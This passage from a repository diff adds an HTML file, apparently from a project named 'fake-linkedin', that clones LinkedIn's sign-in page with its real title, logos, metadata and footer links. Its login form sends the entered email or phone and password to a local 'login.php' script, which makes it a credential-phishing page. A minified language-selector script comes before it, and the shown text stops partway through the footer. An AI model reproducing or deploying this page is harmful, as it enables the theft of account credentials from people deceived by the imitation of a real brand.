!function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=84)}({84:function(e,t){var n=document.querySelector(".language-selector"),o=document.querySelector(".language-selector__button"),r=document.querySelector(".language-selector__dropdown"),c=document.querySelector(".language-selector__link--selected");function u(e){var t=e.target.getAttribute("data-locale");if(t){var n=function(e){if(null!==document.domain){var t=document.domain.split(".").slice(-2).join("."),n=e.toLocaleLowerCase().replace("_","-");return"lang=v=2&lang=".concat(n,";path=/;domain=").concat(t,';expires="Session";SameSite=None;Secure')}return null}(t);null!==n&&(document.cookie=n,location.reload())}}function a(){r&&r.classList.contains("hidden")?(r.classList.remove("hidden"),c.focus()):(r.classList.add("hidden"),o.focus())}function i(e){e&&n&&!n.contains(e.target)&&r.classList.add("hidden")}o.addEventListener("click",a),r.addEventListener("click",u),document.addEventListener("click",i)}});

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,488 @@
<!-- # by [Ali Milani Amin] -->
<!-- # ~> https://github.com/AliMilani/fake-linkedin/ -->
<!-- MIT License -->
<html lang="en-US" class="artdeco ">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EDGE">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="asset-url" id="artdeco/static/images/icons.svg" content="6bja66gymvrvqrp5m6btz3vkz">
<title>LinkedIn Login, Sign in | LinkedIn</title>
<link rel="shortcut icon" href="9lb1g1kp916tat669q9r5g2kz">
<link rel="apple-touch-icon" href="1exdo4axa6eaw1jioxh1vu4fj">
<link rel="apple-touch-icon-precomposed" href="55ggxxse8uyjdh2x78ht3j40q">
<link rel="apple-touch-icon-precomposed" sizes="57x57" href="1exdo4axa6eaw1jioxh1vu4fj">
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="55ggxxse8uyjdh2x78ht3j40q">
<meta name="treeID" content="AAXbbTwYwKzIPLXAANXWrg==">
<meta name="pageKey" content="d_checkpoint_lg_consumerLogin">
<meta name="pageInstance" content="urn:li:page:d_checkpoint_lg_consumerLogin;bYYS5AltSRm2fMCQmdnYhA==">
<meta name="appName" content="checkpoint-frontend">
<meta name="description"
content="Login to LinkedIn to keep in touch with people you know, share ideas, and build your career.">
<meta name="robots" content="noarchive">
<meta property="og:site_name" content="LinkedIn">
<meta property="og:title" content="LinkedIn Login, Sign in | LinkedIn">
<meta property="og:description"
content="Login to LinkedIn to keep in touch with people you know, share ideas, and build your career.">
<meta property="og:type" content="website">
<meta property="og:url" content="https://www.linkedin.com/">
<meta property="og:image" content="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/favicon.ico">
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@linkedin">
<meta name="twitter:title" content="LinkedIn Login, Sign in | LinkedIn">
<meta name="twitter:description"
content="Login to LinkedIn to keep in touch with people you know, share ideas, and build your career.">
<link rel="stylesheet" href="4li12pah6li7xka3r69y2hqap.css">
<link rel="canonical" href="https://www.linkedin.com/login">
<link rel="alternate" hreflang="ar" href="https://www.linkedin.com/login/ar">
<link rel="alternate" hreflang="cs" href="https://www.linkedin.com/login/cs">
<link rel="alternate" hreflang="da" href="https://www.linkedin.com/login/da">
<link rel="alternate" hreflang="de" href="https://www.linkedin.com/login/de">
<link rel="alternate" hreflang="en" href="https://www.linkedin.com/login">
<link rel="alternate" hreflang="es" href="https://www.linkedin.com/login/es">
<link rel="alternate" hreflang="fr" href="https://www.linkedin.com/login/fr">
<link rel="alternate" hreflang="in" href="https://www.linkedin.com/login/in">
<link rel="alternate" hreflang="it" href="https://www.linkedin.com/login/it">
<link rel="alternate" hreflang="ja" href="https://www.linkedin.com/login/ja">
<link rel="alternate" hreflang="ko" href="https://www.linkedin.com/login/ko">
<link rel="alternate" hreflang="ms" href="https://www.linkedin.com/login/ms">
<link rel="alternate" hreflang="nl" href="https://www.linkedin.com/login/nl">
<link rel="alternate" hreflang="no" href="https://www.linkedin.com/login/no">
<link rel="alternate" hreflang="pl" href="https://www.linkedin.com/login/pl">
<link rel="alternate" hreflang="pt" href="https://www.linkedin.com/login/pt">
<link rel="alternate" hreflang="ro" href="https://www.linkedin.com/login/ro">
<link rel="alternate" hreflang="ru" href="https://www.linkedin.com/login/ru">
<link rel="alternate" hreflang="sv" href="https://www.linkedin.com/login/sv">
<link rel="alternate" hreflang="th" href="https://www.linkedin.com/login/th">
<link rel="alternate" hreflang="tl" href="https://www.linkedin.com/login/tl">
<link rel="alternate" hreflang="tr" href="https://www.linkedin.com/login/tr">
<link rel="alternate" hreflang="zh" href="https://www.linkedin.com/login/zh">
<link rel="alternate" hreflang="zh-cn" href="https://www.linkedin.com/login/zh">
<link rel="alternate" hreflang="zh-tw" href="https://www.linkedin.com/login/zh-tw">
<link rel="alternate" hreflang="x-default" href="https://www.linkedin.com/login">
<link rel="preload" href="77qnm4uzm172xn82kvifmelfu" as="script">
<link rel="preload" href="6jblk5oqhlo45xbkmcr7s4zix" as="script">
<link rel="preload" href="dnz8biurbtozxjvxufs5aq4jd" as="script">
<link rel="preload" href="dz6wk4o93mwzoh0t6zsx73kzr" as="script">
</head>
<body class="system-fonts ">
<div id="app__container">
<header><a class="linkedin-logo" href="/" aria-label="Linkedin">
<li-icon tabindex="0" aria-label="LinkedIn" type="linkedin-logo" size="28dp" alt="LinkedIn"
color="brand"><svg width="102" height="26" viewBox="0 0 102 26" fill="none"
xmlns="http://www.w3.org/2000/svg" id="linkedin-logo" preserveAspectRatio="xMinYMin meet"
focusable="false">
<path
d="M13 10H17V22H13V10ZM15 3.8C14.5671 3.80984 14.1468 3.94718 13.7917 4.19483C13.4365 4.44247 13.1623 4.7894 13.0035 5.19217C12.8446 5.59493 12.8081 6.03562 12.8985 6.45903C12.989 6.88244 13.2024 7.26975 13.5119 7.57245C13.8215 7.87514 14.2135 8.07976 14.6389 8.16067C15.0642 8.24159 15.504 8.1952 15.903 8.02732C16.3021 7.85943 16.6428 7.57752 16.8824 7.2169C17.122 6.85627 17.2499 6.43297 17.25 6C17.2515 5.70645 17.1939 5.4156 17.0807 5.14474C16.9675 4.87388 16.801 4.62854 16.5911 4.42331C16.3812 4.21808 16.1322 4.05714 15.8589 3.95006C15.5855 3.84299 15.2934 3.79195 15 3.8ZM4 4H0V22H11V18H4V4ZM57.9 16.2C57.9 16.61 57.9 16.86 57.9 17H48.9C48.9021 17.169 48.9256 17.337 48.97 17.5C49.1765 18.0933 49.5745 18.6011 50.1014 18.9433C50.6282 19.2855 51.254 19.4427 51.88 19.39C52.4142 19.4129 52.9468 19.3171 53.4396 19.1096C53.9324 18.9021 54.3731 18.5881 54.73 18.19L57.45 19.87C56.7533 20.6812 55.88 21.322 54.8971 21.7433C53.9142 22.1645 52.8479 22.3549 51.78 22.3C48.19 22.3 45.12 20.25 45.12 16.11C45.091 15.2506 45.2411 14.3946 45.5608 13.5963C45.8804 12.798 46.3626 12.075 46.9767 11.4731C47.5908 10.8712 48.3234 10.4037 49.128 10.1001C49.9325 9.7966 50.7914 9.66374 51.65 9.71C55.08 9.71 57.9 12 57.9 16.2ZM54.15 14.69C54.16 14.3669 54.0997 14.0455 53.9731 13.748C53.8466 13.4506 53.6569 13.1842 53.4172 12.9673C53.1775 12.7504 52.8935 12.5883 52.5849 12.492C52.2763 12.3958 51.9505 12.3678 51.63 12.41C50.9638 12.3515 50.3013 12.558 49.7865 12.9849C49.2716 13.4118 48.9459 14.0245 48.88 14.69H54.15ZM68 4H72V22H68.61V20.57C68.1486 21.1444 67.5541 21.5977 66.878 21.8904C66.2019 22.1832 65.4646 22.3066 64.73 22.25C62.22 22.25 59.18 20.39 59.18 16C59.18 12.08 61.87 9.75 64.68 9.75C65.299 9.72159 65.9167 9.82856 66.4902 10.0634C67.0636 10.2983 67.5788 10.6555 68 11.11V4ZM68.3 16C68.3 14.12 67.13 12.87 65.64 12.87C65.2366 12.8697 64.8373 12.9508 64.466 13.1084C64.0946 13.266 63.7589 13.4969 63.4788 13.7872C63.1988 14.0775 62.9801 14.4214 62.836 14.7981C62.6919 15.1749 62.6252 15.5769 62.64 15.98C62.6279 16.3815 62.6966 16.7813 62.842 17.1557C62.9874 17.5301 63.2064 17.8716 63.4862 18.1597C63.766 18.4479 64.1008 18.677 64.4708 18.8333C64.8407 18.9897 65.2383 19.0702 65.64 19.07C66.0201 19.0542 66.393 18.9609 66.7357 18.7957C67.0785 18.6305 67.3838 18.3969 67.6329 18.1094C67.8821 17.8219 68.0698 17.4864 68.1845 17.1236C68.2992 16.7609 68.3385 16.3785 68.3 16ZM45.76 10H41L37.07 14.9H37V4H33V22H37V16.27H37.07L41.07 22H46L41 15.48L45.76 10ZM26.53 9.7C25.7825 9.68818 25.0441 9.8653 24.3833 10.2149C23.7226 10.5645 23.1607 11.0754 22.75 11.7H22.7V10H19V22H23V15.47C22.956 15.1525 22.9801 14.8292 23.0706 14.5216C23.1611 14.2141 23.316 13.9294 23.525 13.6863C23.7341 13.4432 23.9924 13.2474 24.2829 13.1118C24.5734 12.9763 24.8894 12.9041 25.21 12.9C26.31 12.9 27 13.49 27 15.42V22H31V14.56C31 10.91 28.71 9.7 26.53 9.7ZM102 2V24C102 24.5304 101.789 25.0391 101.414 25.4142C101.039 25.7893 100.53 26 100 26H78C77.4696 26 76.9609 25.7893 76.5858 25.4142C76.2107 25.0391 76 24.5304 76 24V2C76 1.46957 76.2107 0.960859 76.5858 0.585786C76.9609 0.210714 77.4696 0 78 0L100 0C100.53 0 101.039 0.210714 101.414 0.585786C101.789 0.960859 102 1.46957 102 2ZM84 10H80V22H84V10ZM84.25 6C84.2599 5.553 84.1365 5.11317 83.8954 4.73664C83.6542 4.36011 83.3064 4.06396 82.8962 3.88597C82.4861 3.70798 82.0322 3.65622 81.5925 3.73731C81.1528 3.8184 80.7472 4.02865 80.4275 4.34124C80.1079 4.65382 79.8885 5.05456 79.7976 5.49233C79.7066 5.9301 79.7482 6.38503 79.9169 6.79909C80.0856 7.21314 80.3739 7.56754 80.7449 7.81706C81.1159 8.06657 81.5529 8.19989 82 8.2C82.2934 8.20805 82.5855 8.15701 82.8588 8.04994C83.1322 7.94286 83.3812 7.78192 83.5911 7.57669C83.801 7.37146 83.9675 7.12612 84.0807 6.85526C84.1939 6.5844 84.2514 6.29355 84.25 6ZM98 14.56C98 10.91 95.71 9.66 93.53 9.66C92.7782 9.65542 92.0375 9.84096 91.3766 10.1994C90.7158 10.5578 90.1562 11.0774 89.75 11.71V10H86V22H90V15.47C89.956 15.1525 89.9801 14.8292 90.0706 14.5216C90.1611 14.2141 90.316 13.9294 90.525 13.6863C90.7341 13.4432 90.9924 13.2474 91.2829 13.1118C91.5734 12.9763 91.8894 12.9041 92.21 12.9C93.31 12.9 94 13.49 94 15.42V22H98V14.56Z"
fill="#0A66C2"></path>
</svg></li-icon>
</a></header>
<main class="app__content" role="main">
<form method="post" id="otp-generation" action="" class="hidden"><input type="hidden" disabled
name="csrfToken" value="ajax:2154104713253448829"><input type="hidden" name="resendUrl" value=""
id="input-resend-otp-url"><input type="hidden" name="midToken" value=""><input type="hidden"
disabled name="session_redirect" value=""><input type="hidden" disabled name="parentPageKey"
value="d_checkpoint_lg_consumerLogin"><input type="hidden" disabled name="pageInstance"
value="urn:li:page:d_checkpoint_lg_consumerLogin;bYYS5AltSRm2fMCQmdnYhA=="><input type="hidden"
disabled name="controlId" value="d_checkpoint_lg_consumerLogin-SignInUsingOneTimeSignInLink"><input
type="hidden" name="session_redirect" value=""><input type="hidden" name="trk"
value="guest_homepage-basic_nav-header-signin"><input type="hidden" disabled name="authUUID"
value=""><input type="hidden" name="encrypted_session_key" value=""></form><code
id="i18nOtpSuccessMessage"
style="display: none;"><!--"Weve sent a one time link to your email address. Dont see it? Check your spam folder."--></code><code
id="i18nOtpErrorMessage"
style="display: none;"><!--"An unexpected error has occurred. Please try again."--></code>
<div data-litms-pageview="true"></div>
<div id="" class="card-layout">
<div id="organic-div" class="">
<div class="header__content ">
<h1 class="header__content__heading ">Sign in</h1>
<p class="header__content__subheading ">Stay updated on your professional world</p>
</div>
<form method="post" class="login__form" action="login.php" novalidate=""><input type="hidden"
disabled name="csrfToken" value="ajax:2154104713253448829"><code
id="login_form_validation_error_username"
style="display: none;"><!--"Please enter a valid username"--></code><code
id="consumer_login__text_plain__large_username"
style="display: none;"><!--"Email or phone number must be between 3 to 128 characters"--></code><code
id="consumer_login__text_plain__no_username"
style="display: none;"><!--"Please enter an email address or phone number"--></code>
<div class="form__input--floating mt-24"><input id="username" name="session_key" type="text"
aria-describedby="error-for-username" required="" validation="email|tel" class=""
autofocus="" aria-label="Email or Phone"><label class="form__label--floating"
for="username" aria-hidden="true">Email or Phone</label>
<div error-for="username" id="error-for-username" class="form__label--error hidden"
role="alert" aria-live="assertive"></div>
</div><code id="domainSuggestion" style="display: none;"><!--false--></code><input type="hidden"
disabled name="ac" value="0"><input type="hidden" disabled name="sIdString"
value="4358bfdc-35ac-4932-9423-a5d58e276aa8"><input type="hidden" disabled
name="parentPageKey" value="d_checkpoint_lg_consumerLogin"><input type="hidden" disabled
name="pageInstance"
value="urn:li:page:d_checkpoint_lg_consumerLogin;bYYS5AltSRm2fMCQmdnYhA=="><input
type="hidden" disabled name="trk" value="guest_homepage-basic_nav-header-signin"><input
type="hidden" disabled name="authUUID" value=""><input type="hidden" disabled
name="session_redirect" value=""><input type="hidden" disabled name="loginCsrfParam"
value="2bcf606b-3b80-420c-8609-7599945195cf"><input type="hidden" disabled name="fp_data"
value="default" id="fp_data_login"><input type="hidden" disabled name="apfc" value="{}"
id="apfc-login"><input type="hidden" disabled name="_d" value="d"><input type="hidden"
disabled name="showGoogleOneTapLogin" value="true"><code id="i18nShow"
style="display: none;"><!--"show"--></code><code id="i18nHide"
style="display: none;"><!--"hide"--></code><input type="hidden" disabled name="controlId"
value="d_checkpoint_lg_consumerLogin-login_submit_button"><code
id="consumer_login__text_plain__empty_password"
style="display: none;"><!--"Please enter a password."--></code><code
id="consumer_login__text_plain__small_password"
style="display: none;"><!--"The password you provided must have at least 6 characters."--></code><code
id="consumer_login__text_plain__large_password"
style="display: none;"><!--"The password you provided must have at most 400 characters."--></code><code
id="consumer_login__text_plain__wrong_password"
style="display: none;"><!--"Hmm, that&#39;s not the right password. Please try again "--></code><code
id="consumer_login__text_plain__large_password_200_chars"
style="display: none;"><!--"The password you provided must have at most 200 characters."--></code>
<div class="form__input--floating mt-24"><input id="password" type="password"
aria-describedby="error-for-password" name="session_password" required=""
validation="password" class="" aria-label="Password"><label for="password"
class="form__label--floating" aria-hidden="true">Password</label><span
id="password-visibility-toggle" class="button__password-visibility" role="button"
tabindex="0">show</span>
<div error-for="password" id="error-for-password" class="form__label--error hidden"
role="alert" aria-live="assertive"></div>
</div><a
href="https://linkedin.com/checkpoint/rp/request-password-reset?trk=guest_homepage-basic_nav-header-signin"
class="btn__tertiary--medium forgot-password"
data-cie-control-urn="forgot-password-btn">Forgot password?</a>
<div class="login__form_action_container "><button
class="btn__primary--large from__button--floating" data-litms-control-urn="login-submit"
type="submit" aria-label="Sign in">Sign in</button></div>
</form>
<div class="alternate-signin-container">
<div id="or-separator" class="or-separator mt-12 snapple-seperator"><span
class="or-text">or</span></div><button id="sign-in-with-google-button"
class="alternate-signin__btn mt-12" type="button" aria-label="Sign in with Google"><svg
xmlns="http://www.w3.org/2000/svg" width="22" height="24" viewBox="0 0 22 24"
fill="none">
<path fill-rule="evenodd" clip-rule="evenodd"
d="M12.1354 5.75C14.0004 5.75 15.4794 6.396 16.4204 7.33L19.0744 4.676C17.3544 3 14.9584 2 12.1354 2C8.1984 2 4.8554 4.148 3.1704 7.302L6.2004 9.7C7.0974 7.39 9.3304 5.75 12.1354 5.75Z"
fill="#E94435"></path>
<path fill-rule="evenodd" clip-rule="evenodd"
d="M5.7708 11.9896C5.7708 11.1806 5.9248 10.4106 6.2008 9.7006L3.1708 7.3016C2.4238 8.7006 1.9998 10.2946 1.9998 11.9896C1.9998 13.7206 2.4098 15.3266 3.1358 16.7256L6.1958 14.3026C5.9248 13.5956 5.7708 12.8206 5.7708 11.9896Z"
fill="#F8BB15"></path>
<path fill-rule="evenodd" clip-rule="evenodd"
d="M15.8107 17.3084C14.8667 17.8694 13.6267 18.2294 12.0107 18.2294C9.3627 18.2294 7.1007 16.6654 6.1957 14.3034L3.1357 16.7254C4.7837 19.9024 8.0767 22.0004 12.0107 22.0004C14.7537 22.0004 17.0727 21.1524 18.7877 19.6654L15.8107 17.3084Z"
fill="#34A751"></path>
<path fill-rule="evenodd" clip-rule="evenodd"
d="M22 11.9896C22 11.3086 21.931 10.6436 21.801 9.9996H12V13.9996H18.062L18.018 14.2496C17.784 15.4466 17.068 16.5606 15.811 17.3086L18.788 19.6656C20.818 17.9056 22 15.2466 22 11.9896Z"
fill="#547DBE"></path>
</svg><span class="btn-text">Sign in with Google</span></button><button
class="sign-in-with-apple-button" type="button" aria-label="Sign in with Apple"><svg
width="24" height="24" viewBox="0 2 24 24" fill="none"
xmlns="http://www.w3.org/2000/svg">
<rect width="24" height="24" fill="transparent"></rect>
<path
d="M17.569 12.6254C17.597 15.652 20.2179 16.6592 20.247 16.672C20.2248 16.743 19.8282 18.1073 18.8662 19.5166C18.0345 20.735 17.1714 21.9488 15.8117 21.974C14.4756 21.9986 14.046 21.1799 12.5185 21.1799C10.9915 21.1799 10.5142 21.9489 9.2495 21.9987C7.93704 22.0485 6.93758 20.6812 6.09906 19.4673C4.38557 16.9842 3.0761 12.4508 4.83438 9.39061C5.70786 7.87092 7.26882 6.90859 8.96311 6.88391C10.2519 6.85927 11.4683 7.753 12.2562 7.753C13.0436 7.753 14.5219 6.67821 16.0759 6.83605C16.7265 6.8632 18.5527 7.09947 19.7253 8.81993C19.6309 8.87864 17.5463 10.095 17.569 12.6254ZM15.058 5.1933C15.7548 4.34789 16.2238 3.171 16.0959 2C15.0915 2.04046 13.877 2.67085 13.1566 3.5158C12.5109 4.26404 11.9455 5.46164 12.0981 6.60946C13.2176 6.69628 14.3612 6.03925 15.058 5.1933Z"
fill="black"></path>
</svg><span class="sign-in-with-apple-button__text">Sign in with Apple</span></button><code
id="appleSignInLibScriptPath"
style="display: none;"><!--"1gpe377m8n1eq73qveizv5onv"--></code><code
id="i18nErrorAppleSignInGeneralErrorMessage"
style="display: none;"><!--"Something went wrong. Please try using username and password."--></code>
</div>
</div>
<div id="otp-div" class="hidden">
<div class="otp-success-container">
<h2 class="otp__header__content">Weve emailed a one-time link to your primary email address
</h2>
<p class="medium_text subheader__content">Click on the link to sign in instantly to your
LinkedIn account.</p>
<div class="mailbox__logo" aria-hidden="true"><svg width="64" height="64" viewBox="0 0 64 64"
fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M1 11H63V54H1V11Z" fill="#95ABC1"></path>
<path
d="M1 54L23.1 33.2C24.3 32.1 25.8 31.5 27.5 31.5H36.6C38.2 31.5 39.8 32.1 41 33.2L63 54H1Z"
fill="#B4C6D8"></path>
<path d="M63 11L36.5 36.8C34 39.2 29.9 39.2 27.4 36.8L1 11H63Z" fill="#D1DDE9"></path>
</svg></div>
<p class="medium_text footer__content">If you don't see the email in your inbox, check your spam
folder.</p><button class="resend-button mt-12" id="btn-resend-otp" type="button"
aria-label="Resend email">Resend email</button><button id="otp-cancel-button"
class="otp-back-button" aria-label="Back">Back</button>
</div>
</div>
</div>
<div class="join-now">New to LinkedIn? <a
href="https://linkedin.com/signup/cold-join?source=guest_homepage-basic_nav-header-signin"
class="btn__tertiary--medium" id="join_now" data-litms-control-urn="login_join_now"
data-cie-control-urn="join-now-btn">Join now</a></div>
<div id="checkpointGoogleOneTapContainerId" class="googleOneTapContainer global-alert-offset"></div>
</main>
<footer class="footer__base" role="contentinfo">
<div class="footer__base__wrapper">
<p class="copyright">
<li-icon type="linkedin-logo" size="14dp" alt="LinkedIn" color="" aria-hidden="true"><svg
preserveAspectRatio="xMinYMin meet" focusable="false">
<g class="scaling-icon" style="fill-opacity: 1">
<defs></defs>
<g class="logo-14dp">
<g class="dpi-1">
<g class="inbug" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
<path
d="M14,1.25 L14,12.75 C14,13.44 13.44,14 12.75,14 L1.25,14 C0.56,14 0,13.44 0,12.75 L0,1.25 C0,0.56 0.56,0 1.25,0 L12.75,0 C13.44,0 14,0.56 14,1.25"
class="bug-text-color" fill="#FFFFFF"
transform="translate(42.000000, 0.000000)"></path>
<path
d="M56,1.25 L56,12.75 C56,13.44 55.44,14 54.75,14 L43.25,14 C42.56,14 42,13.44 42,12.75 L42,1.25 C42,0.56 42.56,0 43.25,0 L54.75,0 C55.44,0 56,0.56 56,1.25 Z M47,5 L48.85,5 L48.85,6.016 L48.893,6.016 C49.259,5.541 50.018,4.938 51.25,4.938 C53.125,4.938 54,5.808 54,8 L54,12 L52,12 L52,8.75 C52,7.313 51.672,6.875 50.632,6.875 C49.5,6.875 49,7.75 49,9 L49,12 L47,12 L47,5 Z M44,12 L46,12 L46,5 L44,5 L44,12 Z M46.335,3 C46.335,3.737 45.737,4.335 45,4.335 C44.263,4.335 43.665,3.737 43.665,3 C43.665,2.263 44.263,1.665 45,1.665 C45.737,1.665 46.335,2.263 46.335,3 Z"
class="background" fill="#0073B0"></path>
</g>
<g class="linkedin-text">
<path
d="M40,12 L38.107,12 L38.107,11.1 L38.077,11.1 C37.847,11.518 37.125,12.062 36.167,12.062 C34.174,12.062 33,10.521 33,8.5 C33,6.479 34.291,4.938 36.2,4.938 C36.971,4.938 37.687,5.332 37.97,5.698 L38,5.698 L38,2 L40,2 L40,12 Z M36.475,6.75 C35.517,6.75 34.875,7.49 34.875,8.5 C34.875,9.51 35.529,10.25 36.475,10.25 C37.422,10.25 38.125,9.609 38.125,8.5 C38.125,7.406 37.433,6.75 36.475,6.75 L36.475,6.75 Z"
fill="#000000"></path>
<path
d="M31.7628,10.8217 C31.0968,11.5887 29.9308,12.0627 28.4998,12.0627 C26.3388,12.0627 24.9998,10.6867 24.9998,8.4477 C24.9998,6.3937 26.4328,4.9377 28.6578,4.9377 C30.6758,4.9377 31.9998,6.3497 31.9998,8.6527 C31.9998,8.8457 31.9708,8.9997 31.9708,8.9997 L26.8228,8.9997 L26.8348,9.1487 C26.9538,9.8197 27.6008,10.5797 28.6358,10.5797 C29.6528,10.5797 30.2068,10.1567 30.4718,9.8587 L31.7628,10.8217 Z M30.2268,7.9047 C30.2268,7.0627 29.5848,6.4297 28.6508,6.4297 C27.6058,6.4297 26.9368,7.0597 26.8728,7.9047 L30.2268,7.9047 Z"
fill="#000000"></path>
<polygon fill="#000000"
points="18 2 20 2 20 7.882 22.546 5 25 5 21.9 8.199 24.889 12 22.546 12 20 8.515 20 12 18 12">
</polygon>
<path
d="M10,5 L11.85,5 L11.85,5.906 L11.893,5.906 C12.283,5.434 13.031,4.938 14.14,4.938 C16.266,4.938 17,6.094 17,8.285 L17,12 L15,12 L15,8.73 C15,7.943 14.821,6.75 13.659,6.75 C12.482,6.75 12,7.844 12,8.73 L12,12 L10,12 L10,5 Z"
fill="#000000"></path>
<path
d="M7,12 L9,12 L9,5 L7,5 L7,12 Z M8,1.75 C8.659,1.75 9.25,2.341 9.25,3 C9.25,3.659 8.659,4.25 8,4.25 C7.34,4.25 6.75,3.659 6.75,3 C6.75,2.341 7.34,1.75 8,1.75 L8,1.75 Z"
fill="#000000"></path>
<polygon fill="#000000" points="0 2 2 2 2 10 6 10 6 12 0 12"></polygon>
</g>
</g>
<g class="dpi-gt1" transform="scale(0.2917)">
<g class="inbug" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
<path
d="M44.5235,0 L3.6185,0 C1.6625,0 0.0005,1.547 0.0005,3.454 L0.0005,44.545 C0.0005,46.452 1.6625,48 3.6185,48 L44.5235,48 C46.4825,48 48.0005,46.452 48.0005,44.545 L48.0005,3.454 C48.0005,1.547 46.4825,0 44.5235,0"
class="bug-text-color" fill="#FFFFFF"
transform="translate(143.000000, 0.000000)"></path>
<path
d="M187.5235,0 L146.6185,0 C144.6625,0 143.0005,1.547 143.0005,3.454 L143.0005,44.545 C143.0005,46.452 144.6625,48 146.6185,48 L187.5235,48 C189.4825,48 191.0005,46.452 191.0005,44.545 L191.0005,3.454 C191.0005,1.547 189.4825,0 187.5235,0 Z M162,18 L168.5,18 L168.5,21.266 C169.437,19.388 171.838,17.7 175.445,17.7 C182.359,17.7 184,21.438 184,28.297 L184,41 L177,41 L177,29.859 C177,25.953 176.063,23.75 173.68,23.75 C170.375,23.75 169,26.125 169,29.859 L169,41 L162,41 L162,18 Z M150,41 L157,41 L157,18 L150,18 L150,41 Z M158,10.5 C158,12.985 155.985,15 153.5,15 C151.015,15 149,12.985 149,10.5 C149,8.015 151.015,6 153.5,6 C155.985,6 158,8.015 158,10.5 Z"
class="background" fill="#0073B0"></path>
</g>
<g class="linkedin-text">
<path
d="M136,41 L130,41 L130,37.5 C128.908,39.162 125.727,41.3 122.5,41.3 C115.668,41.3 111.2,36.975 111.2,30 C111.2,23.594 114.951,17.7 121.5,17.7 C124.441,17.7 127.388,18.272 129,20.5 L129,7 L136,7 L136,41 Z M123.25,23.9 C119.691,23.9 117.9,26.037 117.9,29.5 C117.9,32.964 119.691,35.2 123.25,35.2 C126.81,35.2 129.1,32.964 129.1,29.5 C129.1,26.037 126.81,23.9 123.25,23.9 L123.25,23.9 Z"
fill="#000000"></path>
<path
d="M108,37.125 C105.722,40.02 101.156,41.3 96.75,41.3 C89.633,41.3 85.2,36.354 85.2,29 C85.2,21.645 90.5,17.7 97.75,17.7 C103.75,17.7 108.8,21.917 108.8,30 C108.8,31.25 108.6,32 108.6,32 L92,32 L92.111,32.67 C92.51,34.873 94.873,36 97.625,36 C99.949,36 101.689,34.988 102.875,33.375 L108,37.125 Z M101.75,27 C101.797,24.627 99.89,22.7 97.328,22.7 C94.195,22.7 92.189,24.77 92,27 L101.75,27 Z"
fill="#000000"></path>
<polygon fill="#000000"
points="63 7 70 7 70 27 78 18 86.75 18 77 28.5 86.375 41 78 41 70 30 70 41 63 41">
</polygon>
<path
d="M37,18 L43,18 L43,21.375 C43.947,19.572 47.037,17.7 50.5,17.7 C57.713,17.7 59,21.957 59,28.125 L59,41 L52,41 L52,29.625 C52,26.969 52.152,23.8 48.5,23.8 C44.8,23.8 44,26.636 44,29.625 L44,41 L37,41 L37,18 Z"
fill="#000000"></path>
<path
d="M29.5,6.125 C31.813,6.125 33.875,8.189 33.875,10.5 C33.875,12.811 31.813,14.875 29.5,14.875 C27.19,14.875 25.125,12.811 25.125,10.5 C25.125,8.189 27.19,6.125 29.5,6.125 L29.5,6.125 Z M26,41 L33,41 L33,18 L26,18 L26,41 Z"
fill="#000000"></path>
<polygon fill="#000000" points="0 7 7 7 7 34 22 34 22 41 0 41"></polygon>
</g>
</g>
</g>
</g>
</svg></li-icon><em><span class="a11y__label">LinkedIn</span>© 2022</em>
</p>
<div>
<ul class="footer__base__nav-list" aria-label="Footer Legal Menu">
<li><a href="/legal/user-agreement?trk=d_checkpoint_lg_consumerLogin_ft_user_agreement">User
Agreement</a></li>
<li><a href="/legal/privacy-policy?trk=d_checkpoint_lg_consumerLogin_ft_privacy_policy">Privacy
Policy</a></li>
<li><a
href="/help/linkedin/answer/34593?lang=en&amp;trk=d_checkpoint_lg_consumerLogin_ft_community_guidelines">Community
Guidelines</a></li>
<li><a href="/legal/cookie-policy?trk=d_checkpoint_lg_consumerLogin_ft_cookie_policy">Cookie
Policy</a></li>
<li><a href="/legal/copyright-policy?trk=d_checkpoint_lg_consumerLogin_ft_copyright_policy">Copyright
Policy</a></li>
<li id="feedback-request"><a
href="/help/linkedin?trk=d_checkpoint_lg_consumerLogin_ft_send_feedback&amp;lang=en"
target="_blank" rel="nofollow noreferrer noopener">Send Feedback</a></li>
<li>
<div class="language-selector">
<div class="language-selector__dropdown hidden">
<ul>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="ar_AE">العربية (Arabic)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="cs_CZ">Čeština (Czech)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="da_DK">Dansk (Danish)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="de_DE">Deutsch (German)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link language-selector__link--selected role="
button"="" data-locale="en_US"><strong>English
(English)</strong></button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="es_ES">Español (Spanish)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="fr_FR">Français (French)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="hi_IN">हिंदी (Hindi)</button></li>
